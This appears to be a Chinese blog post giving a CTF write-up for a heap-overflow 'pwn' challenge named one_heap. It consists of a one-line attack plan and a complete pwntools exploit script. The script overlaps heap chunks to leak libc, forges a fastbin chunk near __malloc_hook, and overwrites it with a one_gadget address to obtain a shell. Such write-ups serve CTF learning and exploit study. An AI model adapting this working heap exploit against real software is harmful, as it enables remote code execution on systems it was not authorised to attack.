pwn-one_heap(堆溢出)


思路:
构造双重身份的chunk泄露libc->伪造malloc附近的trunk->编辑将onegadget的值给malloc->调用malloc即调用onegadget->shell

from pwn import *
from LibcSearcher import *
def conn():
    global r,Libc,elf
    r = process("./one_heap")
    Libc = ELF("./libc-2.23.so")
    #r = remote("1.95.36.136", 2064)
    #elf = ELF("./pwn1")
def add(x,y,z):
    r.sendlineafter(b"Choice!\n",b"1")
    r.sendlineafter(b"name:\n",str(x).encode())
    r.sendlineafter(b"Size:\n",str(y).encode())
    r.sendlineafter(b"Emo!:\n",z)
def edit(x,y):
    r.sendlineafter(b"Choice!\n",b"3")
    r.sendlineafter(b"index:\n",str(x).encode())
    r.sendlineafter(b"Content\n",y)
def free(x):
    r.sendlineafter(b"Choice!\n",b"2")
    r.sendlineafter(b"index:\n",str(x).encode())   
def show(x):
    r.sendlineafter(b"Choice!\n",b"4")
    r.sendlineafter(b"index:\n",str(x).encode())    
def pwn():
    add(0,0x68,b'a')
    add(1,0x68,b'a')
    add(2,0x68,b'a')
    add(3,0x68,b'a')
    edit(0,0x68*b'a'+p64(0xe1))
    free(1)
    add(1,0x68,b'a')
    show(2)
    libc = u64(r.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))- 0x3c4b78
    print("libc>>>",hex(libc))
    malloc = libc+Libc.sym["__malloc_hook"]
    print("maloc>>>",hex(malloc-0x23))
    one = [0x4527a,0xf03a4,0xf1247]
    onegadget = libc+one[2]
    add(0,0x68,b'a')
    add(1,0x68,b'a')
    free(1)
    edit(0,b'a'*0x68+p64(0x71)+p64(malloc-0x23))
    add(1,0x68,b'a')
    add(6,0x68,b'')
    edit(6,b'A'*(0x13)+p64(onegadget))
    print("onegadget>>>",hex(onegadget))
    #add(7,0x68,b'a')
    #r.sendlineafter(b"Choice!\n",b"1")
    gdb.attach(r)
    r.interactive()
conn()
pwn()
posted @ 2025-05-01 23:46  lethe311  阅读(3)  评论(0)    收藏  举报